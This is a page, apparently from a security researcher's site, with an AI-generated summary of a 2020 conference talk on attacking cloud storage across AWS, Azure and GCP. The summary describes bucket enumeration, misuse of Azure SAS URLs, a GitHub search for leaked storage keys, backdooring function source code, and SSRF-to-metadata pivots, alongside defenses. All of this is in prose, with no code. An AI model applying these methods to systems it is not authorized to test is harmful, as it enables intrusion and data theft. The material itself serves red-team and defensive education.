Attacking Storage Services : The Lynchpin of Cloud Services

HITB Cyber Week Dubai: Red Team Village

18 November 2020

As part of HITB Cyber Week Dubai, I presented a Talk at Red Team Village

Slides

Video

AI Generated Summary

AI Generated Content Disclaimer

Note: This summary is AI-generated and may contain inaccuracies, errors, or omissions. If you spot any issues, please contact the site owner for corrections. Errors or omissions are unintended.

This presentation at HITB CyberWeek 2020 Red Team Village examines how cloud storage services serve as the lynchpin of cloud infrastructure and why they represent a critical attack surface. Anant Shrivastava, then Technical Director at NotSoSecure Global Services, walks through real-world case studies spanning AWS, Azure, and GCP, presents a structured attack methodology from enumeration through post-exploitation, and provides defenses that both cloud vendors and tenants should implement. The central argument: cloud storage is “the linchpin of cloud services” — a critical component that, when compromised, enables massive organizational damage because virtually every other cloud service depends on it.

Summary

The talk opens by establishing cloud storage’s central role in modern infrastructure. Beyond the obvious file and document storage, cloud storage services (AWS S3, Azure Storage, GCP Storage, Digital Ocean Spaces, SharePoint, OneDrive, Dropbox, Google Drive, and code repositories like GitHub and Bitbucket) underpin virtually all cloud operations. Anant uses the analogy of an external disk connected to a laptop — that is how cloud storage fundamentally operates. PaaS and FaaS environments do not even maintain source code on specific systems; the code is stored in storage containers and retrieved when spinning up new instances. This decoupled architecture means that higher-level access to cloud storage can cascade into massive organizational damage.

The case studies are drawn from real-world incidents and the speaker’s own engagements. An early study found that 10% of all surveyed S3 buckets were publicly accessible, and of those, 20% were world-writable — affecting organizations from Booz Allen Hamilton to WWE to Dow Jones. The HackerOne case study (2016) demonstrates how a security company’s own S3 bucket was writable by any authenticated AWS user, enabling social engineering attacks through planted documents. The Rocket.chat incident shows supply chain risk: their installer referenced an unclaimed S3 bucket that an ethical hacker claimed, gaining the ability to serve malicious content to anyone running the installer (which typically runs with sudo privileges). Most dramatically, the Linux Vendor Firmware Service (LVFS) case combined an unclaimed S3 bucket with a PGP signature bypass vulnerability, resulting in 2.5 million update requests from 500,000 unique IP addresses over 26 days — illustrating dangling resource risks at massive scale.

Enumeration techniques exploit a fundamental property: storage names are globally unique per provider. Organizations predictably append company names to bucket identifiers (e.g., “example-assets”, “example-secrets”), making brute-force enumeration viable. Tools like Cloud Enum take a keyword, build mutation lists, and check across AWS, Azure, and GCP simultaneously. AWS S3 error messages helpfully reveal the correct region when querying the wrong one. Additional enumeration paths include Cloud Scraper (extracting cloud URLs from website HTML), GrayHat Warfare (a search engine for public S3 buckets), and Google dorking for s3.amazonaws.com or core.windows.net URLs.

Azure SAS (Shared Access Signature) URLs receive detailed treatment. Contrary to common assumption, SAS URLs provide container-level or storage-level access, not access to a single resource — the same signature that points to one JPG file grants access to the entire storage account. The speaker describes discovering a SAS URL, loading it into Azure Storage Explorer, finding another container with Azure Function source code, planting a backdoor, and waiting for the next function invocation to execute it. Leaked Azure storage keys are searchable on GitHub via the DefaultEndpointsProtocol keyword, with 64,479 hits at the time of the talk.

Post-exploitation paths include credential harvesting from office document metadata using FOCA or ExifTool, backdooring PaaS/FaaS source code stored in buckets, and extracting secrets (passwords, API keys, PEM files) for lateral movement. The SSRF-to-EC2-takeover chain is particularly instructive: starting from an SSRF vulnerability to extract metadata credentials, gaining access to S3 buckets, finding a bucket conveniently named with PEM files containing 200 key pairs for different servers — mapped by server name — and escalating to IAM admin access. A similar Elastic Beanstalk attack exploited predictable bucket naming patterns to access and backdoor source code deployed via automated CI/CD pipelines, resulting in a backdoor on the official website within minutes.

The AWS Cognito research crowdsourced 2,504 identity pool identifiers, revealing that more than 1 in 5 configurations were insecure, exposing 906 S3 buckets with sensitive data and 1,572 Lambda functions with at least 78 sensitive environment variables.

Defenses emphasize the shared responsibility model. Cloud vendors should provide clear warnings and automation (like AWS Config rules that run every 24 hours or on configuration changes to detect and auto-remediate public buckets). Tenant responsibilities center on strict IAM policies following least privilege, understanding that “authenticated user” access means any authenticated user on the entire platform (not your organization), periodic scanning with tools like Scout Suite, and — critically — validating that security measures actually work. The talk introduces chaos engineering principles: simulate attacks, observe system responses, and fine-tune if reactions are not up to the mark.

Key Themes

Notable Points

Actionable Takeaways

  1. Treat cloud storage as a high-value target in every engagement — it connects to nearly every other cloud service and often contains secrets, source code, and sensitive data
  2. Enumerate storage resources aggressively using tools like Cloud Enum, Google dorking, Cloud Scraper, and cloud bucket search engines during reconnaissance
  3. Check for misconfigured permissions including anonymous access, writable public buckets, and overly permissive “authenticated user” settings across AWS S3, Azure Blob, and GCP Storage
  4. Hunt for leaked Azure SAS URLs and storage account keys on GitHub (search DefaultEndpointsProtocol) as common entry points for storage compromise
  5. Chain SSRF vulnerabilities with cloud metadata services to obtain temporary credentials, then pivot to storage enumeration using predictable naming patterns
  6. Leverage post-exploitation paths from storage access: extract credentials from document metadata with ExifTool/FOCA, access PaaS/FaaS source code for RCE, and pivot using discovered secrets and PEM files
  7. Implement periodic cloud security scanning with tools like Scout Suite, enforce least-privilege IAM policies, use vendor-native controls such as AWS Config for auto-remediation, and conduct regular attack simulations to validate incident response